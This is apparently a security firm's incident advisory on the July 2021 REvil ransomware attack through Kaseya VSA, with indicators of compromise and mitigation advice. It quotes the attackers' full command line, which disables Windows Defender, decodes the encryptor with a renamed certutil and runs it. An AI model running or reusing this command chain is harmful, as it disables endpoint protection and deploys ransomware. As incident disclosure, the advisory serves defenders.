Kaseya VSA Users Under Ransomware Attack


SpearTip | July 2nd, 2021

Kaseya Ransomware

SpearTip’s engineers have become aware of an urgent ransomware attack in progress affecting Kaseya VSA. The only way to prevent breaches is to block Kaseya VSA whether you’re using the cloud or utilizing the solution internally. Kaseya is currently pushing a hotfix for this issue.

Kaseya provides IT management software to MSPs.

According to security researchers, a ransomware encryptor is being dropped to c:\kworking\agent.exe. The VSA fix is being named “Kaseya VSA Agent Hot-fix” and at least two tasks are running:

“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

A digital copy of the encryptor is being digitally signed with a valid signature with this information:

When the executable runs, these files are being dropped into the hardcoded path c:\Windows:

 

 

 

 

 

 

 

 

Confirmed IoCs:

 

Other files involved:

 

Additional information added 4:25 CT, Fri, Jul 2:

VSA user admin accounts are being disabled just moments before ransomware is being deployed. VSA security notifications indicated the “KEleveted######” account, which is an SQL user, performed this action. Evidence likely points to execution via SQL commands.

Digital Signature used by ransomware operators:

Name PB03 TRANSPORT LTD.
Issuer Sectigo RSA Code Signing CA
Thumbprint 11FF68DA43F0931E22002F1461136C662E623366
Serial Number 11 9A CE AD 66 8B AD 57 A4 8B 4F 42 F2 94 F8 F0 

To enable preventing communications via the firewall, use Kaseya’s Cloud Addresses and Ports listing.

Based on forensic investigations of the intrusion, there are strong connections to the REvil ransomware group or affiliates. REvil has targeted at least 6 large MSPs through the supply-chain attack on Kaseya’s VSA servers.

If your organization is utilizing this service and need assistance in preventing this ransomware from spreading, call our 24/7 Security Operations Center at 833.997.7327.

Kaseya released this statement in regards to the VSA service, “We are experiencing a potential attack against the VSA that has been limited to a small
number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. It’s critical that you do this immediately, because one of the first things the attacker does is shutoff administrative access to the VSA.”

*More information will be added to this article as our engineers investigate*